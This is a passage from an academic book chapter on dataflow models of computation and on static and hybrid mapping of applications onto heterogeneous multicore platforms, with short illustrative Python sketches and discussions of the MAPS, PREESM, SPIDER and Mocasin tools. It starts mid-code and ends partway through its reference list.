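        def add_cluster(self, name, core_type, count, frequency_hz):
            cluster = ["%s%d" % (name, i) for i in range(count)]
            self.cores += [(c, core_type, frequency_hz) for c in cluster]
            return cluster
        def connect(self, cores_a, cores_b, bandwidth):
            self.links.append((tuple(cores_a), tuple(cores_b), bandwidth))

    # An 8-core big.LITTLE-like topology as in Fig. 9a (assumed numbers).
    p = Platform()
    little = p.add_cluster("A7_", "Cortex-A7", 4, 1_400_000_000)
    big = p.add_cluster("A15_", "Cortex-A15", 4, 2_000_000_000)
    p.connect(little, big, bandwidth=7_500_000_000)  # shared bus to DRAM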
Inspired by formal MoCs, recent work focused on devising a mathematical model
of the system-level architecture, called Model of Architecture (MoA) (Pelcat et al.
2016, 2018) (term and relation to MoCs first coined in Gerstlauer et al. 2009).
This allows the mapping tool to directly use the system-level description of the
target system in form of a MoA to evaluate the performance (or other metric) of an
application described in a particular MoC. In this way, there is no need to resort to
more detailed trace-based or full-system simulators as discussed in the following.
Recent work has shown that it is possible to reason about energy consumption at the level of the compiler
intermediate representation (Georgiou et al. 2017). If the target system is available,
performance and energy numbers can be measured and fed back to the mapping tool.
This has been studied thoroughly in recent years for standard processors (Meneses-
Viveros et al. 2021) and is well understood for embedded systems. The PAPIFY
tool (Madronal et al. 2019), for instance, relies on performance counters of the
architecture to measure the energy consumed by different parts of a system at
runtime. By measuring clock cycles and cache misses for each actor firing and
combining them with an internal energy model, PAPIFY can automatically provide
useful performance and energy metrics to improve the mapping of dataflow applications.
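The principle of such counter-based estimation can be summarized in a few lines; the sketch below uses made-up energy coefficients and is not PAPIFY's actual model, which is calibrated per platform.

    # Sketch: per-firing energy from performance counters (assumed weights).
    E_CYCLE = 0.15e-9  # Joule per clock cycle (assumption)
    E_MISS = 6.0e-9    # Joule per cache miss (assumption)

    def firing_energy(cycles, cache_misses):
        return cycles * E_CYCLE + cache_misses * E_MISS

    # Aggregate over the recorded firings of one actor:
    firings = [(12_000, 40), (11_500, 35), (12_300, 52)]  # (cycles, misses)
    total_joule = sum(firing_energy(c, m) for c, m in firings)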
Based on cost models for computation and communication, different approaches
can be used to model the performance of the entire application provided a mapping.
Depending on the MoC, this can be done statically or with analytical models (cf.
MoA mentioned above). For more dynamic models, trace-based simulators use the
information in the system-level description and the costs associated with application
nodes and edges to estimate the metrics for the parallel execution (Pelcat et al.
2014; Pimentel et al. 2006; Menard et al. 2021) (cf. Chap. 26, “Methodologies
for Design Space Exploration”). Most of these trace-based simulators execute
considerably faster than system-level simulators (cf. Chap. 27, “Virtual Prototyp-
ing of Processor-Based Platforms”). Properties of the MoC, such as determinism,
legitimize trace-based simulation. This means, for instance, that small deviations
in the real parallel schedule in the target system are guaranteed not to change the
output of the application as observed during tracing (provided the same inputs, in
the case of dynamic MoCs).
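The following sketch conveys the idea of trace replay under strong simplifying assumptions (fixed per-event costs, blocking reads, no interconnect contention, and processes supplied in a dependency-respecting order); production simulators such as those cited above interleave events properly.

    # Sketch: replay read/write/compute traces of processes against a mapping.
    from collections import defaultdict

    def replay(traces, mapping, freq):
        core_time = defaultdict(float)   # busy-until time per core (s)
        token_ready = defaultdict(list)  # channel -> token production times
        for proc, events in traces.items():
            t, core = 0.0, mapping[proc]
            for kind, arg in events:
                if kind == "compute":    # arg = cycles
                    t = max(t, core_time[core]) + arg / freq[core]
                elif kind == "write":    # arg = channel name
                    token_ready[arg].append(t)
                else:                    # "read": block until a token exists
                    t = max(t, token_ready[arg].pop(0))
                core_time[core] = t
        return max(core_time.values())   # estimated makespan

    traces = {"src": [("compute", 1000), ("write", "ch")],
              "sink": [("read", "ch"), ("compute", 2000)]}
    print(replay(traces, {"src": "big0", "sink": "little0"},
                 {"big0": 2.0e9, "little0": 1.4e9}))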
Static Mapping
In its basic form, a static mapping consists of two functions μA : A → C and
μF : F → L that assign the actors A of the application graph to the cores C of the
target platform and the FIFO channels F to the communication links L. Richer
formulations also fix properties of
the application like buffer sizes, include constraints for mapping to accelerators, and
compute an order for elements that are mapped to the same resource. Note that such
formulations impose implicit constraints on valid solutions. For instance, a mapping
of a channel f = (ai , aj ) ∈ F , μF (f ) = l ∈ L is valid only if the cores resulting
from the mapping μA (ai ) = ck ∈ C and μA (aj ) = cm ∈ C are indeed connected
via the link l, that is, l = (ck , cm ) ∈ L. Similarly, an edge mapping must respect the
size constraints of the underlying resources of a selected link, for instance, the size
of the physical memories.
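In code, these validity conditions reduce to simple checks over μA and μF; a sketch with hypothetical data structures (each channel is checked in isolation, ignoring that several buffers may compete for the same memory):

    # Sketch: validity of a mapping (mu_A: actor -> core, mu_F: channel -> link).
    def is_valid(mu_A, mu_F, links, mem_capacity, buffer_size):
        for f, l in mu_F.items():        # f = (a_i, a_j), l = (c_k, c_m)
            a_i, a_j = f
            if l != (mu_A[a_i], mu_A[a_j]) or l not in links:
                return False             # mapped cores not connected by l
            if buffer_size[f] > mem_capacity[l]:
                return False             # memory behind the link too small
        return True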
Figure 11 shows a generic static mapping flow. As inputs, the mapper takes
the application model, the architecture model, and constraints. Constraints can
represent real-time requirements, such as a given throughput for an actor, or a
latency constraint over a path in the graph. Constraints can also define prescribed
mappings for actors, in the case an actor can only be mapped to an accelerator, or a
predefined subset of resources that implement a given functionality, like a mapping
to a set of cores with access to a particular peripheral. Often the mapper iterates
multiple times before finding a suitable solution that is then passed as the final result
(μ∗A , μ∗F in the figure).
For static dataflow models, a common approach to compute a mapping consists
in analyzing one or several unrolled iterations of the graph (recall from sec-
tions “Homogeneous Synchronous Dataflow (HSDF)” and “Synchronous Dataflow
(SDF)”). In the SDF case, this amounts to an HSDF transformation, unfolding
the resulting HSDF graph and removing edges with delays. The resulting graph
is a directed acyclic graph for which a wealth of methods exist to compute a
mapping (Kwok and Ahmad 1999). The schedule resulting from a so-computed
mapping is called a block schedule, since iterations of the unrolled graph do
not overlap in time during the execution of the application. Algorithms also
exist for computing overlapped schedules and thus exploit graph-level pipeline
parallelism (Honorat et al. 2020).
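For reference, the repetition vector that drives the SDF-to-HSDF unfolding solves the balance equations prod(a) · r(a) = cons(b) · r(b) for every channel between actors a and b. A compact sketch, assuming a connected and consistent graph:

    # Sketch: repetition vector of a consistent, connected SDF graph.
    from fractions import Fraction
    from math import lcm

    def repetition_vector(actors, channels):
        # channels: list of (src, prod_rate, dst, cons_rate)
        r, work = {actors[0]: Fraction(1)}, [actors[0]]
        while work:
            a = work.pop()
            for src, p, dst, c in channels:
                if src == a and dst not in r:
                    r[dst] = r[a] * p / c
                    work.append(dst)
                elif dst == a and src not in r:
                    r[src] = r[a] * c / p
                    work.append(src)
        scale = lcm(*(x.denominator for x in r.values()))
        return {a: int(x * scale) for a, x in r.items()}

    # A --2:3--> B fires A three times and B twice per iteration.
    print(repetition_vector(["A", "B"], [("A", 2, "B", 3)]))  # {'A': 3, 'B': 2}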
Although the nature and order of computations in dynamic dataflow MoCs are,
by definition, data-dependent, the mapping of computational nodes on processing
elements, be they actors or processes, is often done statically. The scheduling
decisions that order computations on the different processing elements, however,
must be taken at runtime for such models. For KPNs and other dynamic
dataflow models, representative runs of the application are required for the mapper
to understand how processes in the application exchange information with one
another. Each application run is modeled via traces, which record the read and write
events on the channels (Castrillon et al. 2010; Van Stralen and Pimentel 2010). The
traces can be used directly to replay the application behavior on a high-level discrete
event simulator (Pimentel et al. 2006; Castrillon et al. 2013; Brunet et al. 2013) or
can be represented as a graph (Castrillon et al. 2012; Brunet 2015). For the latter,
edges model production-consumption relationships, buffer sizing constraints, and
guarded actions in dynamic dataflow actors among others. A graph representation
enables defining quick heuristics that do not require replaying the traces on a
simulator (Castrillon et al. 2013; Brunet 2015).
Apart from heuristics crafted for the special purpose of solving the static mapping
problem, several meta-heuristics have been adapted to solve the problem as well.
A meta-heuristic is a generic solution approach that can be reused and adapted
for particular problem formulations. Genetic algorithms, for instance, mimic the
process of evolution in a pool of solutions to a given problem. Each solution,
or individual, is encoded as a string or chromosome. The pool of solutions is
evolved over generations by using operators for mutation (of a single individual) and
crossover of two individuals, which mimics the reproduction process. Chapter 26,
“Methodologies for Design Space Exploration” goes into much more detail about
how this process can be further customized to solve the static mapping problem.
Other meta-heuristics include random walk, simulated annealing (Kirkpatrick et al.
1983), and tabu search (Glover 1989).
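As a deliberately minimal sketch of this encoding (not any of the cited implementations): a mapping of n actors onto a set of cores becomes a chromosome of core indices, and the evolutionary operators act directly on that string. The fitness function, e.g., an estimated execution time from a trace-based simulator, is supplied by the caller.

    # Sketch: genetic algorithm over chromosome-encoded mappings.
    import random

    def mutate(chrom, n_cores):
        i = random.randrange(len(chrom))
        return chrom[:i] + (random.randrange(n_cores),) + chrom[i + 1:]

    def crossover(a, b):
        cut = random.randrange(1, len(a))
        return a[:cut] + b[cut:]

    def evolve(n_actors, n_cores, fitness, pop=30, gens=50):
        P = [tuple(random.randrange(n_cores) for _ in range(n_actors))
             for _ in range(pop)]
        for _ in range(gens):
            P.sort(key=fitness)          # lower fitness is better
            elite = P[:pop // 2]         # survivors of this generation
            P = elite + [mutate(crossover(*random.sample(elite, 2)), n_cores)
                         for _ in range(pop - len(elite))]
        return min(P, key=fitness)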
In practical frameworks, the mapping problem cannot be fully decoupled from
the implementation. Actor firings can be implemented by means of a task runtime
that distributes ready tasks to worker threads in a way predefined by the computed
mapping (cf. Chap. 30, “Parallel Programming Models” for modern task-based
runtime systems). Actor firings can also be statically scheduled within threads
mapped to cores or managed freely by the operating system (Hautala et al. 2018).
Alternatively, an actor or a process in a KPN can be mapped to a persistent thread
(one process per thread), with the mapping enforced via pinning. A combination of
these implementations is also possible, which further complicates the analysis and
optimization of mappings. Similar implementation options exist for communication
channels, which can be implemented by true message passing, by implementing
FIFO buffers in shared memory, or by a custom memory pool that allows for memory
reuse between logical buffers. In addition, as mentioned in section “Dataflow
Models of Computation”, techniques exist to reuse memory space for multiple
channels for dataflow (Desnos et al. 2015) and for KPNs (Tretter 2018).
Hybrid Mapping
[Fig. 12: hybrid mapping flow with compile-time variant selection and runtime variant
transformation, driven by the system status and additional mapping constraints]
In hybrid mapping, a static phase pre-computes a set of mapping variants at compile
time; at runtime, a dynamic phase then completes a partial solution or selects a
mapping candidate by taking into account the current state of the system. The state
of the system consists of a description of the resource
occupation of the system at application launch time (this is represented as white
boxes in Fig. 12). Apart from the system status, the dynamic phase may also receive
additional constraints for a particular execution of the application. These constraints
help in selecting a subset of the Pareto front described by the variants.
The work in Weichslgartner et al. (2018) is a good representative of a hybrid
mapping methodology which was developed in the context of the Collaborative
Research Center “Invasive Computing” (Teich et al. 2011). The authors use a
hybrid mapping approach for applications represented as task graphs to increase
the utilization of a multicore while respecting real-time constraints and saving
resources. In this particular work, static mapping decisions are encoded as a set of
constraints. A constraint can, for instance, specify what kind of cores should execute
a task (by delivering an execution time below a bound), or at most how far away
two tasks can be mapped. Distance, in this case, can refer to the number of hops for
different routes in a NoC-based architecture. The constraint representation allows
for resource sharing (processors and network links), as opposed to strict spatial
isolation, which increases the utilization of the system as a whole. At runtime,
a constraint solver can be used to determine the final mapping. The authors also
propose a faster backtracking heuristic to reduce the complexity of the runtime
mapping phase.
The works in Singh et al. (2011), Quan and Pimentel (2015), and Goens et al.
(2017a) are good examples of methodologies that pre-compute a set of candidate
mappings that are later selected at runtime. In its simplest form, the runtime mapper
consists of a look-up for the mapping that meets the requirements and fits in the
available resources. This requires less effort than solving a set of constraints but,
naturally, will fail more often since the mappings remain quite rigid. To relax
this, the work in Goens et al. (2017a) relies on the exploitation of platform and
application symmetries, as formalized in Goens et al. (2017b). A symmetry refers
to a transformation that can be applied to a static mapping without changing the
characteristics of the mapping, that is, two symmetric mappings should lead to
the same performance and energy consumption. Symmetries allow clustering static
mappings into equivalence classes, reducing the search space at compile time, and
enabling transformations at runtime. The symmetry-aware runtime system achieved
performance on par with the Linux Completely Fair Scheduler (CFS)
while reducing the time variation by two to three orders of magnitude. Symmetries
are more restrictive than generic constraints, since they require mappings to be
strictly equivalent, as opposed to merely equally good or better. Efficient algorithms based on
symmetries make it possible to switch mapping configurations during the execution
of an application to reduce the overall energy consumption while respecting real-
time constraints (Khasanov and Castrillon 2020; Khasanov et al. 2021).
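The core idea can be sketched in a few lines: if cores of the same type are interchangeable, every mapping can be normalized to a canonical representative of its equivalence class, so symmetric mappings collide in a lookup table. Real implementations (Goens et al. 2017b) handle richer symmetry groups than this simple per-type permutation.

    # Sketch: canonical key of a mapping under permutations of identical cores.
    def canonical(mapping, core_type):
        relabel, counters, key = {}, {}, []
        for actor in sorted(mapping):    # relabel cores in order of first use
            core = mapping[actor]
            t = core_type[core]
            if core not in relabel:
                relabel[core] = (t, counters.get(t, 0))
                counters[t] = counters.get(t, 0) + 1
            key.append((actor, relabel[core]))
        return tuple(key)

    types = {"big0": "big", "big1": "big"}
    assert canonical({"a1": "big0", "a2": "big1"}, types) == \
           canonical({"a1": "big1", "a2": "big0"}, types)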
Another kind of hybrid mapping strategy for dynamic dataflow MoCs consists
of first using a statically defined mapping and using runtime-collected metrics to
update this mapping sporadically (Yviquel et al. 2017).
MAPS
The MAPS project started around 2007 at the RWTH Aachen University, originally
as a trace-driven auto-parallelizing compiler (Ceng et al. 2008). Over the years, the
framework was extended with a high-level simulator for parallel execution (Ceng
et al. 2009), support for parallel applications (Leupers and Castrillon 2010),
mapping heuristics for multiple concurrent applications (Castrillon et al. 2010),
support for hardware accelerators (Castrillon et al. 2011), and support for multiple
backends and ESL simulators. Today, the ideas in MAPS continue to be developed
academically at the RWTH Aachen and the TU Dresden universities and commer-
cially at Silexica GmbH/Inc (Leupers et al. 2017).
For parallel applications, MAPS defined the language C for Process Networks
(CPN) to describe parallel applications using the KPN MoC. CPN is an extension
to the C language with keywords for KPN processes, SDF actors, channels, and
parameters (Castrillon and Leupers 2014) (akin to the example in Fig. 7). As
discussed in section “Static Mapping”, given the dynamic MoC, mapping heuristics
in MAPS rely on traces following a flow similar to that in Fig. 11. With detailed cost
models of the TI DSPs, trace-based mapping heuristics managed to obtain results
comparable to those obtained via manual optimization by expert programmers
as reported in Leupers et al. (2017). A comparative analysis of the quality of
the mappings obtained with simple heuristics and genetic algorithms for KPN
applications can be found in Goens et al. (2016).
Figure 13 shows an updated version of this comparison on a heterogeneous ARM
big.LITTLE platform as described in Fig. 9a. The heuristics used are the Group-
Based Mapping (GBM) heuristic (Castrillon et al. 2012) and a static variant of the
Linux CFS. The metaheuristics include a random walk, simulated annealing (Orsila
et al. 2007), tabu search (Manolache et al. 2008), and genetic algorithms (Erbas et al.
2006). These mapping algorithms were executed ten times on each application of
the Embedded System Synthesis Benchmark Suite (E3S) benchmarks (Dick 2008),
which were adapted to multicore systems using the method presented by Schwarzer
et al. (2017). The figure reports the (geometric) means of the relative times, both for
the execution time of the application with the generated mapping and the exploration
time required. Unsurprisingly, metaheuristics can produce better mappings but
require considerably more computational time.
The situation changes when the complexity of the platform increases. Figure 14
shows the same experiments, this time on a model of the Kalray MPPA3
Coolidge (Kalray Inc 2020). This platform consists of 5 identical clusters fully
connected in a NoC, where each of the clusters has 16 identical cores, as well
as specialized secure and management cores.
Fig. 14 Comparison of multiple mapping heuristics and metaheuristics on the Kalray MPPA3
Coolidge platform for the E3S benchmark suite
The difference in performance of heuristics and metaheuristics in these larger
platforms is less marked. Notably, the
static CFS heuristic significantly outperforms every other algorithm, both in terms of
mapping quality and exploration time. More sophisticated metaheuristics have more
trouble with extremely large design spaces. Indeed, for the largest application in the
E3S benchmarks, the design space has 85^9 ≈ 2.3 · 10^17 mappings, which is more
than 10^9 times larger than the design space for the big.LITTLE architecture above.
More recently, approaches based on exploiting the symmetry of the prob-
lem (cf. section “Hybrid Mapping”) have helped in reducing the size of design
spaces (Goens et al. 2017b; Schwarzer et al. 2017). Figure 15 shows the same setup
as above, evaluating the E3S benchmarks on the same two platforms. In the figure,
a standard variant of the algorithms is compared to one where the design space is
pruned using symmetries. In terms of exploration time, using symmetries tends to
reduce the time by a considerable amount. More importantly, however, they seem
to mitigate the poor performance of the metaheuristics on the more complex design
space of the MPPA3 Coolidge. The same simulated annealing heuristic performs an
average of 32× better on this symmetry-pruned design space.
In a recent effort, these newer developments as well as a subset of the methods
described in section “Optimization of Dataflow Programs” were combined into the
Mocasin toolbox (Menard et al. 2021) and released under an open-source license
(Mocasin GitHub Repository: https://github.com/tud-ccc/mocasin.). Mocasin pro-
vides a high-level simulator for performance estimation and implements various
mapping strategies, including the symmetry-based and hybrid approaches discussed
above. Mocasin does not provide a complete tool flow from source code to an
optimized implementation tailored for a specific platform. Mocasin, instead, is a
tool designed specifically to support researchers in their efforts to develop better
strategies for mapping complex applications to heterogeneous many-cores. There-
fore, Mocasin is designed as a flexible infrastructure with increased interoperability
with other tools, allowing for quick prototyping and evaluation of new approaches.
Since Mocasin already implements a wide range of known mapping strategies, new
methods can be directly compared to the state of the art in a comparison similar
to the one shown in Figs. 13 and 14. The authors expect Mocasin and similar
[Fig. 15: exploration time (normed, log scale) of the standard and symmetry-pruned
variants of each mapping algorithm, on the ARM big.LITTLE and MPPA3 Coolidge platforms]
PREESM
PREESM, which stands for Parallel and Real-time Embedded Executives Scheduling
Method, is an open-source rapid prototyping framework created in 2007 at the
IETR, in collaboration with Texas Instruments (Pelcat et al. 2014). PREESM is
developed as a set of plugins for the Eclipse integrated development environment.
As a rapid prototyping framework, the purpose of PREESM is to enable developers
to design an application and to rapidly assess Key Performance Indicators (KPIs)
of its deployment on a given heterogeneous MPSoC. For example, KPIs optimized
and predicted by PREESM are computation and communication resource utiliza-
tion (Pelcat et al. 2009, 2016), application throughput and latency (Pelcat et al.
2009; Deroui et al. 2017), energy consumption (Pelcat et al. 2016; Holmbacka et al.
2014), or memory footprint (Desnos et al. 2015, 2016). In addition to predicting
these metrics, PREESM also offers software synthesis capabilities for generating
working prototypes on commercial multi- and many-core chips (Pelcat et al. 2014;
Hascoët et al. 2017).
The workflow adopted by PREESM is the Y-chart methodology (Kienhuis et al.
2001) depicted in Fig. 11. The three inputs taken by PREESM are: an application
model, specified as a π SDF graph; an architecture model, specified in the S-LAM
format (Pelcat et al. 2009); and a scenario gathering the deployment constraints.
SPIDER
In PREESM, all mapping, scheduling, and memory allocation decisions are made
statically at compile time, which forbids the use of the reconfiguration capabilities
of the π SDF MoC. In order to run a dynamically reconfigurable π SDF graph,
a runtime manager is needed to handle graph reconfigurations and to manage
resource allocation on-the-fly while executing the application. The Synchronous
Parameterized and Interfaced Dataflow Embedded Runtime (SPIDER) (Heulot et al.
2014) serves that purpose for reconfigurable π SDF graphs.
The inputs and workflow of SPIDER are identical to those of PREESM, illustrated in
Fig. 11, with two major differences. (1) Values of reconfigurable parameters of the
π SDF graph are set dynamically by configuration actors of the application, and as
a result, (2) all graph transformation and resource allocation decisions are made at
runtime. Using a runtime manager to control the execution of a reconfigurable graph
incurs an overhead on application performance. Indeed, such a runtime manager requires
processor time to compute repetition vectors, to perform graph transformations,
and to map and schedule actor firings. Nevertheless, as presented in Heulot et al.
(2013, 2014), even for large reconfigurable graphs with several hundred
actors, this overhead is largely compensated by the efficiency of the scheduling
decisions. The performance of SPIDER proved to be on par with, or better than,
OpenMP performance for suitable applications (Heulot et al. 2014). As for PREESM,
the performance of SPIDER was assessed on a wide variety of signal and image
processing applications and on several commercial heterogeneous multi- and many-
core targets.
In recent development, leading to the release of SPIDER 2.0 (SPIDER 2.0 GitHub
Repository: https://github.com/preesm/spider2), the efficiency of SPIDER for
mapping and scheduling π SDF graphs was greatly improved by using a numerical
representation instead of performing the π SDF to HSDF transformation (Arrestier
et al. 2019). By using a numerical representation instead of building and storing
HSDF graphs for resource allocations, the memory footprint of the runtime manager
was reduced on average by 97%, and the overhead of the runtime manager was
reduced on average by 85%.
Conclusion
This chapter discussed how dataflow MoCs and MoCs in general are appealing
alternatives to get a handle on the complexity of programming modern MPSoCs. It
provided definitions and examples of the most prominent dataflow MoCs, including
HSDF, SDF, and KPN, and gave insight into more recent adaptable models such as
π SDF. The chapter also explained how the properties of a MoC can be leveraged to
engineer tool flows that, based on models of the target system, produce an optimized
implementation of the program. Static and hybrid optimization approaches were
discussed and illustrated by means of two academic tools with more than a decade
of research, MAPS and PREESM. Moving forward, the authors expect efforts to
consolidate into open-source tools like PREESM, Ptolemy (Ptolemaeus 2014) and
Mocasin (Menard et al. 2021). Interoperability and fast prototyping of models and
algorithms will speed up advances in the field. Such advances are dearly needed,
with ever more dynamic workloads coming up in interconnected emerging appli-
cations like autonomous driving and 5G communication. Similarly, emerging tech-
nologies (Castrillon et al. 2018) and interconnect (Fettweis et al. 2019) will require
a more principled approach to program synthesis, enabled in part by future MoCs.
Acknowledgments This work was funded in part by the German Federal Ministry of Education
and Research (BMBF) through the E4C project (16ME0426K), by the BMBF project 6G-life hub
(16KISK001K), by the German Research Foundation (DFG) through TraceSymm (366764507),
by the Studienstiftung des Deutschen Volkes, by the CERBERO (Cross-layer modEl-based fRame-
work for multi-oBjective dEsign of Reconfigurable systems in unceRtain hybRid envirOnments)
Horizon 2020 Project, by the European Union Commission under Grant 732105, and by the French
Agence Nationale de la Recherche under grant ANR-20-CE46-0001 (DARK-ERA project).
References
Alur R, Courcoubetis C, Dill D (1990) Model-checking for real-time systems. In: [1990]
Proceedings. Fifth annual IEEE symposium on logic in computer science. IEEE, pp 414–425
Arrestier F, Desnos K, Juarez E, Menard D (2019) Numerical representation of directed acyclic
graphs for efficient dataflow embedded resource allocation. ACM Trans Embed Comput Syst
18(5s). ISSN: 1539-9087. https://doi.org/10.1145/3358225
Bebelis V, Fradet P, Girault A, Lavigueur B (2013) BPDF: a statically analyzable dataflow model
with integer and boolean parameters. In: 2013 proceedings of the international conference on
embedded software (EMSOFT). IEEE, pp 1–10
Bhattacharya B, Bhattacharyya SS (2001) Parameterized dataflow modeling for DSP systems.
IEEE Trans Sig Process 49(10):2408–2421
Bhattacharyya SS, Brebner G, Janneck JW, Eker J, Von Platen C, Mattavelli M, Raulet M
(2009) OpenDF: a dataflow toolset for reconfigurable hardware and multicore systems. ACM
SIGARCH Comput Archit News 36(5):29–35
Bilsen G, Engels M, Lauwereins R, Peperstraete J (1996) Cycle-static dataflow. IEEE Trans Sig
Process 44(2):397–408
Biscondi E, Flanagan T, Fruth F, Lin Z, Moerman F (2012) Maximizing multicore efficiency with
navigator runtime, White Paper. www.ti.com/lit/wp/spry190/spry190.pdf
Bouakaz A, Talpin J-P, Vitek J (2012) Affine data-flow graphs for the synthesis of hard real-time
applications. In: 2012 12th international conference on application of concurrency to system
design. IEEE, pp 183–192
Brunet SC (2015) Analysis and optimization of dynamic dataflow programs. PhD thesis, Ecole
Polytechnique Federale de Lausanne (EPFL)
Brunet SC, Alberti C, Mattavelli M, Janneck J (2013) Turnus: a unified dataflow design space
exploration framework for heterogeneous parallel systems. In: 2013 conference on design and
architectures for signal and image processing (DASIP), pp 47–54
Buck JT (1993) Scheduling dynamic dataflow graphs with bounded memory using the token flow
model. PhD thesis, EECS Department, University of California, Berkeley. http://www2.eecs.
berkeley.edu/Pubs/TechRpts/1993/2429.html
Castrillon J, Leupers R (2014) Programming heterogeneous MPSoCs: tool flows to close the
software productivity gap. Springer, p 258. ISBN: 978-3-319-00675-8. https://doi.org/10.1007/
978-3-319-00675-8
Castrillon J, Velásquez R, Stulova A, Sheng W, Ceng J et al (2010) Trace-based KPN composability
analysis for mapping simultaneous applications to MPSoC platforms. In: Proceedings of
the conference on design, automation and test in Europe DATE’10. European Design and
Automation Association, Dresden, pp 753–758. ISBN: 978-3-9810801-6-2. http://dl.acm.org/
citation.cfm?id=1870926.1871107
Castrillon J, Schürmans S, Stulova A, Sheng W, Kempf T et al (2011) Component-based
waveform development: the nucleus tool flow for efficient and portable software defined radio.
Analog Integr Circuits Sig Process 69(2–3):173–190. ISSN: 0925-1030. https://doi.org/10.
1007/s10470-011-9670-1
Castrillon J, Tretter A, Leupers R, Ascheid G (2012) Communication-aware mapping of KPN
applications onto heterogeneous MPSoCs. In: Proceedings of the 49th annual design automation
conference DAC’12. ACM, San Francisco, pp 1266–1271. ISBN: 978-1-4503-1199-1. https://
doi.org/10.1145/2228360.2228597
Castrillon J, Leupers R, Ascheid G (2013) MAPS: mapping concurrent dataflow applications to
heterogeneous MPSoCs. IEEE Trans Ind Inform 9(1):527–545. ISSN: 1551-3203. https://doi.
org/10.1109/TII.2011.2173941
Castrillon J, Lieber M, Klüppelholz S, Völp M, Asmussen N et al (2018) A hardware/soft-
ware stack for heterogeneous systems. IEEE Trans Multi-Scale Comput Syst 4(3):243–259.
ISSN: 2332-7766. https://doi.org/10.1109/TMSCS.2017.2771750. http://ieeexplore.ieee.org/
document/8103042/
C/DA Design Automation (2020) IEEE standard for software-hardware interface for multi- many-
core. In: IEEE Std 2804-2019, pp 1–84. https://doi.org/10.1109/IEEESTD.2020.8985663.
https://standards.ieee.org/standard/28042019.html
Ceng J, Castrillon J, Sheng W, Scharwächter H, Leupers R et al (2008) MAPS: an integrated
framework for MPSoC application parallelization. In: Proceedings of the 45th annual design
automation conference DAC’08. ACM, Anaheim, pp 754–759. ISBN: 978-1-60558-115-6.
https://doi.org/10.1145/1391469.1391663
Ceng J, Sheng W, Castrillon J, Stulova A, Leupers R, Ascheid G, Meyr H (2009) A high-
level virtual platform for early MPSoC software development. In: Proceedings of the 7th
IEEE/ACM international conference on hardware/software codesign and system synthesis
(CODES+ISSS’09). ACM, Grenoble, pp 11–20. ISBN: 978-1-60558-628-1. http://doi.org/10.
1145/1629435.1629438
Church A (1985) The calculi of lambda-conversion, vol 6. Princeton University Press, Princeton
Dardaillon M, Marquet K, Risset T, Martin J, Charles H-P (2016) A new compilation flow
for software-defined radio applications on heterogeneous MPSoCs. ACM Trans Archit Code
Optim (TACO) 13(2):1–25
de Dinechin BD (2013) Dataflow language compilation for a single chip massively parallel
processor. In: 2013 IEEE 6th international workshop on multi-/many-core computing systems
(MuCoCoS). IEEE. pp 1–1
de Dinechin BD (2015) Kalray MPPA®: massively parallel processor array: revisiting DSP
acceleration with the Kalray MPPA manycore processor. In: 2015 IEEE hot chips 27 symposium
(HCS). IEEE, pp 1–27
Dennis JB (1974) First version of a data flow procedure language. In: Robinet B (ed) Programming
symposium. Springer, Berlin/Heidelberg, pp 362–376. ISBN: 978-3-540-37819-8
Deroui H, Desnos K, Nezan J-F, Munier-Kordon A (2017) Relaxed subgraph execution model for
the throughput evaluation of IBSDF graphs. In: 2017 international conference on embedded
computer systems: architectures, modeling, and simulation (SAMOS). IEEE, pp 213–220
Desnos K, Pelcat M, Nezan J-F, Bhattacharyya SS, Aridhi S (2013) PiMM: parameterized and
interfaced dataflow meta-model for MPSoCs runtime reconfiguration. In: 2013 international
conference on embedded computer systems: architectures, modeling, and simulation (SAMOS).
IEEE, pp 41–48
Desnos K, Pelcat M, Nezan J-F, Aridhi S (2015) Memory analysis and optimized allocation of
dataflow applications on shared-memory MPSoCs. J Sig Process Syst 80(1):19–37
Desnos K, Pelcat M, Nezan J-F, Aridhi S (2016) Distributed memory allocation technique for
synchronous dataflow graphs. In: 2016 IEEE international workshop on signal processing
systems (SiPS). IEEE, pp 45–50
Dick R (2008) Embedded Systems Synthesis Benchmark Suite (E3S). http://ziyang.eecs.umich.edu/~dickrp/e3s/
Ecker W, Müller W, Dömer R (2009) Hardware-dependent software. Springer, Dordrecht, pp 1–13
Eker J, Janneck J (2003) CAL language report Technical report, ERL Technical Memo UCB/ERL,
Springer Netherlands
Erbas C, Cerav-Erbas S, Pimentel AD (2006) Multiobjective optimization and evolutionary
algorithms for the application mapping problem in multiprocessor system-on-chip design. IEEE
Trans Evol Comput 10(3):358–374
Eusse JF, Williams C, Leupers R (2014) CoEx: a novel profiling-based algorithm/architecture
co-exploration for ASIP design. ACM Trans Reconfig Technol Syst. https://doi.org/10.1109/
ReCoSoC.2013.6581520
Fettweis G, Dörpinghaus M, Castrillon J, Kumar A, Baier C et al (2019) Architecture and
advanced electronics pathways towards highly adaptive energy-efficient computing. Proc
IEEE 107(1):204–231. ISSN: 0018-9219. https://doi.org/10.1109/JPROC20182874895. https://
ieeexplore.ieee.org/document/8565890
Fradet P, Girault A, Krishnaswamy R, Nicollin X, Shafiei A (2018) RDF: Reconfigurable Dataflow
(extended version), Technical report INRIA Grenoble-Rhône- Alpes
Gao L, Huang J, Ceng J, Leupers R, Ascheid G, Meyr H (2009) TotalProf: a fast and accurate
retargetable source code profiler. In: CODES+ISSS’09: proceedings of the 7th IEEE/ACM
international conference on hardware/software codesign and system synthesis. ACM, Grenoble,
pp 305–314. ISBN: 978-1-60558-628-1. https://doi.org/10.1145/1629435.1629477
Georgiou K, Kerrison S, Chamski Z, Eder K (2017) Energy transparency for deeply embedded
programs. ACM Trans Archit Code Optim (TACO) 14(1):1–26
Gerstlauer A, Haubelt C, Pimentel AD, Stefanov TP, Gajski DD, Teich J (2009) Electronic
system-level synthesis methodologies. IEEE Trans Comput-Aided Des Integr Circuits Syst
28(10):1517–1530
Ghasemi A, Cataldo R, Diguet J-P, Martin KJM (2021) On cache limits for dataflow applications
and related efficient memory management strategies. In: Workshop on design and architectures
for signal and image processing, 14th edn., pp 68–76
Gleim U, Levy M (2013) MTAPI: parallel programming for embedded multicore systems. In: The
multicore association
Glover F (1989) Tabu search—part I. ORSA J Comput 1(3):190–206
Goens A, Khasanov R, Castrillon J, Polstra S, Pimentel A (2016) Why comparing system-
level MPSoC mapping approaches is difficult: a case study. In: Proceedings of the IEEE 10th
international symposium on embedded multicore/many-core systems-on-chip (MCSoC-16),
Ecole Centrale de Lyon, Lyon, pp 281–288. https://doi.org/10.1109/MCSoC.2016.48
Goens A, Khasanov R, Hähnel M, Smejkal T, Härtig H, Castrillon J (2017a) TETRiS: a multi-
application run-time system for predictable execution of static mappings. In: Proceedings of the
